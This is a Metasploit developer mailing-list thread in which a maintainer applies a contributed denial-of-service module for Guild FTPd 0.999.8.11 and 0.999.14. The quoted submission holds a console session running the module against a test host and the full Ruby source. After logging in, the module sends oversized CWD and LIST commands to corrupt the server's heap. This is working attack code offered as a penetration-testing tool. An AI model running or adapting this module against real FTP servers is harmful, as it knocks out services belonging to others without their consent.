Applied. Thanks! Best regards,
On Tue, 2008-10-14 at 01:50 -0500, Kris Katterjohn wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hey guys, > > I've attached a new DoS auxiliary module for Guild FTPd versions 0.999.8.11 > and 0.999.14. It's based on the Python script from yesterday which says it > works for these versions, but I've only been able to test it on the latter. > > This module needs the patch I sent a few minutes ago fixing banner grabbing in > Exploit::Remote::Ftp. > > msf > use dos/windows/ftp/guildftp_cwdlist > msf auxiliary(guildftp_cwdlist) > set RHOST 192.168.10.2 > RHOST => 192.168.10.2 > msf auxiliary(guildftp_cwdlist) > set FTPUSER test > FTPUSER => test > msf auxiliary(guildftp_cwdlist) > set FTPPASS test > FTPPASS => test > msf auxiliary(guildftp_cwdlist) > run > [*] Connecting to FTP server 192.168.10.2:21... > [*] Connected to target FTP server. > [*] Authenticating as test with password test... > [*] Sending password... > [*] Sending commands... > [*] Auxiliary module execution completed > > > msf auxiliary(guildftp_cwdlist) > info > > Name: Guild FTPd 0.999.8.11/0.999.14 Heap Corruption > Version: 1 > > Provided by: > Kris Katterjohn <[EMAIL PROTECTED]> > > Basic options: > Name Current Setting Required Description > ---- --------------- -------- ----------- > FTPPASS test yes Valid FTP password for username > FTPUSER test yes Valid FTP username > RHOST 192.168.10.2 yes The target address > RPORT 21 yes The target port > > Description: > Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap > corruption. You need to have a valid login so you can run CWD and > LIST. > > > Thanks, > Kris Katterjohn > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQIVAwUBSPRBUP9K37xXYl36AQLsCg//WB/fVpEJez+Ox+dRp36vn2+nCGXatZMJ > i4LKcYfFOB/jh0IU4AQgQv/hwmIUwNooHw2TMmaG6LL2wnO8Iw1Pvr9G4S4/XqB1 > V6Eah1f1WXOPxAehCaIihC0FqLljtjOFeCqT56B4Gi2pKyfctUitzSy6+irPwX4G > 7e27gf4E2JeU/3eGUOahIh0a1988uZCy6GBNe6AwoSPsSLwFn+m4z3BqiGJ4TNsI > lll/AXToIytS7HpogGzcEuldU/EomOgH+YTTSWpL0DkPo/bhRW6fd02QzTqKmI+I > /M1X2V4k5L2VMGsPG19MJ8STGfZOVMnqSIJPwwXtcOcwNXmJO8AQcNZaOKX98rw9 > oWBVHGin2IZzfyW3oJwvlab3aMVMgoheQoHQqQwjbDel/dX5vCwzEWmjChBur6By > JoS+K4BDIHdinb9B5lkKAPqWfRO3PtraIGk2mEuML+uKGCSHtts0nMqCW1p4+bPs > MtCbeJRqsI4SIK1Yls0A45mVK4Nb6IK2wShI2cJtgpV4+LHtYRexjAlJMliwXMPp > 2YZi2ngWm55pLioEosnTI82EVU5qZMTr9N6HJKuD0sjfOUwyao1DIAsFmQdZAssm > wAr3D37g97YO9isNfXqkvWP1GU0wWTwKlxUW+wRlJ6osFZkyX5GvMx+UAsDpJgBI > /PegfNjeIOM= > =pHjH > -----END PGP SIGNATURE----- > plain text document attachment (guildftp_cwdlist.rb) > require 'msf/core' > > class Metasploit3 < Msf::Auxiliary > > include Msf::Exploit::Remote::Ftp > > def initialize(info = {}) > super(update_info(info, > 'Name' => 'Guild FTPd 0.999.8.11/0.999.14 > Heap Corruption', > 'Description' => %q{ > Guild FTPd 0.999.8.11 and 0.999.14 are > vulnerable > to heap corruption. You need to have a valid > login > so you can run CWD and LIST. > }, > 'Author' => 'Kris Katterjohn <[EMAIL > PROTECTED]>', > 'License' => MSF_LICENSE, > 'Version' => '1', > 'References' => > [ [ 'URL', 'http://milw0rm.com/exploits/6738'] > ], > 'DisclosureDate' => 'Oct 12 2008')) > > # They're required > register_options([ > OptString.new('FTPUSER', [ true, 'Valid FTP username', > 'anonymous' ]), > OptString.new('FTPPASS', [ true, 'Valid FTP password > for username', 'anonymous' ]) > ]) > end > > def run > connect_login > > print_status("Sending commands...") > > # We want to try to wait for responses to these > raw_send_recv("CWD #{'/.' * 124}\r\n") > raw_send_recv("LIST #{'X' * 100}\r\n") > > disconnect > end > end > > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers